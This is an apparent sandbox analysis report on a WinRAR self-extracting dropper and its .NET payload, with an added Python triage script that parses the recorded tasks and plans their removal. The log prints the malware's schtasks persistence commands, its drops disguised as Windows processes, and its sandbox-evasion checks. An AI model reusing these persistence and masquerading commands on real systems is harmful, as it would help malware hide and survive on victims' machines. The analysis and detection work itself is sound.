          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: unknown unknown
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: unknown unknown
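          The five schtasks /create lines above are the sample's persistence layer: two ONLOGON triggers plus minute-interval watchdogs, most with /rl HIGHEST, all pointing at binaries dropped under non-Windows directories and named after Windows processes (RuntimeBroker.exe) or after the random WGNWJePMcpkvwPkbkGq stem. The script below is an added example and is not part of the Joe Sandbox report or of the sample's own code. It parses those command lines as copied from the report, applies the "Schedule system process" and "Files With System Process Name In Unsuspected Locations" heuristics in simplified form, works out which task definitions actually survive the repeated /create /f on the same task name, and emits the schtasks /delete commands and dropped paths an incident responder would want. The lists of system process names and of the directories Windows keeps them in are the editor's assumption for illustration, not a Windows-defined list.

```python
"""Triage of the schtasks persistence and masquerading drop paths recorded above.
Added example, not part of the Joe Sandbox output: command lines and paths are
copied from the report; the rules and the allow-lists of Windows process names
and directories are the editor's assumptions, not the sandbox's own logic."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# schtasks command lines spawned by C:\runtimebrokerHost\webnetdhcp.exe (from the report).
REPORT_SCHTASKS = [
    r'''schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f''',
    r'''schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f''',
]
# PE files the report shows webnetdhcp.exe dropping into third-party directories.
REPORT_DROPPED_FILES = [
    r"C:\Program Files (x86)\google\RuntimeBroker.exe",
    r"C:\Program Files\7-Zip\SearchApp.exe",
    r"C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe",
]

# Assumed allow-list (editor's): Windows process names and where Windows installs them.
# C:\Windows itself is matched exactly (explorer.exe); the other directories as whole trees.
SYSTEM_PROCESS_NAMES = {
    "runtimebroker.exe", "searchapp.exe", "svchost.exe", "lsass.exe", "csrss.exe",
    "winlogon.exe", "services.exe", "smss.exe", "wininit.exe", "dllhost.exe",
    "taskhostw.exe", "sihost.exe", "conhost.exe", "explorer.exe",
}
LEGIT_EXACT_DIRS = {r"c:\windows"}
LEGIT_DIR_TREES = (r"c:\windows\system32", r"c:\windows\syswow64",
                   r"c:\windows\systemapps", r"c:\windows\winsxs")


def masquerades_as_system_binary(path: str) -> bool:
    """Well-known Windows process name outside the directories Windows keeps it in
    (the idea behind 'Files With System Process Name In Unsuspected Locations')."""
    directory, _, name = path.lower().rpartition("\\")
    if name not in SYSTEM_PROCESS_NAMES or directory in LEGIT_EXACT_DIRS:
        return False
    return not any(directory == d or directory.startswith(d + "\\") for d in LEGIT_DIR_TREES)


@dataclass
class ScheduledTask:
    name: str
    schedule: str             # /sc value: ONLOGON, MINUTE, ...
    modifier: Optional[int]   # /mo value, e.g. every N minutes
    action: str               # program the task runs (/tr, both quote layers stripped)
    run_level: str            # /rl value; schtasks defaults to LIMITED when absent
    force: bool               # /f: overwrite an existing task with the same name
    findings: List[str] = field(default_factory=list)


def _opt(pattern: str, cmd: str, default: Optional[str] = None) -> Optional[str]:
    m = re.search(pattern, cmd, re.IGNORECASE)
    return m.group(1) if m else default


def parse_schtasks_create(cmd: str) -> ScheduledTask:
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        raise ValueError("not a schtasks /create command line")
    tr = _opt(r'/tr\s+"([^"]*)"', cmd) or _opt(r"/tr\s+(\S+)", cmd, "")
    mo = _opt(r"/mo\s+(\d+)", cmd)
    return ScheduledTask(
        name=_opt(r'/tn\s+"([^"]*)"', cmd) or _opt(r"/tn\s+(\S+)", cmd, ""),
        schedule=_opt(r"/sc\s+(\S+)", cmd, "").upper(),
        modifier=int(mo) if mo else None,
        action=tr.strip().strip("'\""),   # the report shows /tr "'C:\...exe'"
        run_level=(_opt(r"/rl\s+(\S+)", cmd) or "LIMITED").upper(),
        force=bool(re.search(r"\s/f\b", cmd, re.IGNORECASE)),
    )


def assess(task: ScheduledTask) -> ScheduledTask:
    """Apply the persistence heuristics that fired on this sample."""
    if masquerades_as_system_binary(task.action):
        task.findings.append("system process name outside a Windows directory")
    if task.run_level == "HIGHEST":
        task.findings.append("runs with highest privileges")
    if task.schedule == "ONLOGON":
        task.findings.append("re-launched at every logon")
    if task.schedule == "MINUTE" and task.modifier is not None and task.modifier <= 15:
        task.findings.append(f"re-launched every {task.modifier} min (watchdog)")
    return task


def triage(cmdlines: List[str]) -> List[ScheduledTask]:
    return [assess(parse_schtasks_create(c)) for c in cmdlines]


def effective_tasks(tasks: List[ScheduledTask]) -> Dict[str, ScheduledTask]:
    """/create /f replaces a task of the same name, so only the last definition per
    name survives (here the /mo 9 task is superseded by the /mo 13, HIGHEST one)."""
    return {t.name: t for t in tasks}


def cleanup_plan(tasks: List[ScheduledTask]) -> Tuple[List[str], List[str]]:
    """Delete commands for the surviving tasks, plus every binary any task points at."""
    deletes = [f'schtasks /delete /tn "{n}" /f' for n in sorted(effective_tasks(tasks))]
    return deletes, sorted({t.action for t in tasks})


def flag_dropped_files(paths: List[str]) -> List[str]:
    return [p for p in paths if masquerades_as_system_binary(p)]


if __name__ == "__main__":
    tasks = triage(REPORT_SCHTASKS)
    for t in tasks:
        print(f"{t.name:22} {t.schedule:7} {t.modifier or '':>3} {t.run_level:8} {t.action}")
        for finding in t.findings:
            print(f"    -> {finding}")
    print(*cleanup_plan(tasks)[0], sep="\n")
    print("masquerading drops:", flag_dropped_files(REPORT_DROPPED_FILES))
```

          The parser only handles the quoting style seen in this report (/tr "'path'") and Win32-style paths; process-creation events from an EDR or Sysmon may carry the image path as \Device\HarddiskVolumeN\... or with %SystemRoot%, which the directory check above does not normalize. Note also that the task named WGNWJePMcpkvwPkbkGqW is created twice, so the /mo 9 LIMITED definition is overwritten by the /mo 13 HIGHEST one, and only four tasks are left to delete.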
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: dxgidebug.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: sfc_os.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: policymanager.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: msvcp110_win.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: pcacli.dll
          Source: C:\Users\user\Desktop\findme.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: mscoree.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: apphelp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: kernel.appcore.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: version.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: uxtheme.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: windows.storage.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: wldp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: profapi.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: cryptsp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: rsaenh.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: cryptbase.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: sspicli.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: amsi.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: userenv.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: rasapi32.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: rasman.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: rtutils.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: mswsock.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: winhttp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: iphlpapi.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: dhcpcsvc.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: dnsapi.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: winnsi.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: rasadhlp.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: fwpuclnt.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: edputil.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: ntmarta.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: wbemcomn.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: propsys.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: urlmon.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: iertutil.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: srvcli.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: netutils.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: wintypes.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: appresolver.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: bcp47langs.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: slc.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: sppc.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll (in each of the 5 schtasks.exe instances)
          Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll (in each of the 5 schtasks.exe instances)
          Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll (in each of the 5 schtasks.exe instances)
          Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll (in each of the 5 schtasks.exe instances)
          Source: C:\Users\user\Desktop\findme.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\7-Zip\SearchApp.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\7-Zip\38384e6a620884
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\Windows Defender\Platform\9e8d7a4ca61bd9
          Source: findme.exe | Static file information: File size 3403917 > 1048576
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: findme.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: findme.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: findme.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: findme.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: findme.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: findme.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: findme.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: findme.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\findme.exe | File created: C:\runtimebrokerHost\__tmp_rar_sfx_access_check_4397375
          Source: findme.exe | Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DE28C push eax; ret 0_2_004DE2AA
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DED46 push ecx; ret 0_2_004DED59
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Code function: 10_2_00007FFAAC4986BD pushfd ; iretd 10_2_00007FFAAC4986C4
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Code function: 10_2_00007FFAAC492C13 pushad ; retf 10_2_00007FFAAC492C91

          Persistence and Installation Behavior

          Source: C:\runtimebrokerHost\webnetdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (42 identical entries)
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\runtimebrokerHost\lsass.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File written: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Program Files (x86)\Google\RuntimeBroker.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Users\jones\AppData\Local\WmiPrvSE.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Program Files\7-Zip\SearchApp.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Recovery\RuntimeBroker.exe
          Source: C:\Users\user\Desktop\findme.exe | File created: C:\runtimebrokerHost\webnetdhcp.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Recovery\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exe

          Boot Survival

          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\Users\user\Desktop\findme.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process information set: NOOPENFILEERRORBOX (61 identical entries)

          Malware Analysis System Evasion

          Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive (3 identical entries)
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Memory allocated: 14E0000 memory reserve | memory write watch
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Memory allocated: 1B000000 memory reserve | memory write watch
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 922337203685477
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 600000
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599890
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599780
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599653
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599539
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599417
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599281
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599171
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 599057
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598948
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598844
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598734
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598625
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598516
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598406
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598294
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598184
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 598071
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597959
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597844
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597712
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597608
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597496
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597390
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597280
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 597164
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596995
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596866
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 596609
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Window / User API: threadDelayed 3887
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Window / User API: threadDelayed 1865
          Source: C:\Users\user\Desktop\findme.exe | Evasive API call chain: GetLocalTime,DecisionNodes | graph_0-23083
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7428 | Thread sleep count: 3887 > 30
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7428 | Thread sleep count: 1865 > 30
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7476 | Thread sleep time: -180000s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -13835058055282155s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -600000s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599890s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599780s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599653s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599539s >= -30000s
          Source: C:\runtimebrokerHost\webnetdhcp.exe TID: 7592 | Thread sleep time: -599417s >= -30000s
